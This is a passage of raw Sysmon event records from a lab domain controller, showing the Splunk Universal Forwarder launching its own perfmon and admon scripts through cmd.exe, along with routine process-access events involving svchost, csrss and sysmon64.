Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002201Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.123{5D479F2C-16B7-5F84-6300-000000007F01}3780C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002200Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.011{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B7-5F84-6200-000000007F01}3360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002199Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002198Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002197Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002196Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002195Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002194Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002193Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002192Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002191Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.011{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002190Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.011{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16B7-5F84-6200-000000007F01}3360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002189Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.011{5D479F2C-16B1-5F84-3000-000000007F01}26163792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16B7-5F84-6200-000000007F01}3360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002188Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:27.014{5D479F2C-16B7-5F84-6200-000000007F01}3360C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002256Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:28.527{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B8-5F84-6600-000000007F01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002255Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:28.511{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B8-5F84-6600-000000007F01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002254Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:28.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002253Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:28.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002252Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:28.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002251Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:28.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002250Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:28.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002249Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:28.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002248Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:28.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002247Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:28.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002246Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:28.511{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16B8-5F84-6600-000000007F01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002245Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:28.511{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002244Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:28.511{5D479F2C-16B1-5F84-3000-000000007F01}26164088C:\Program 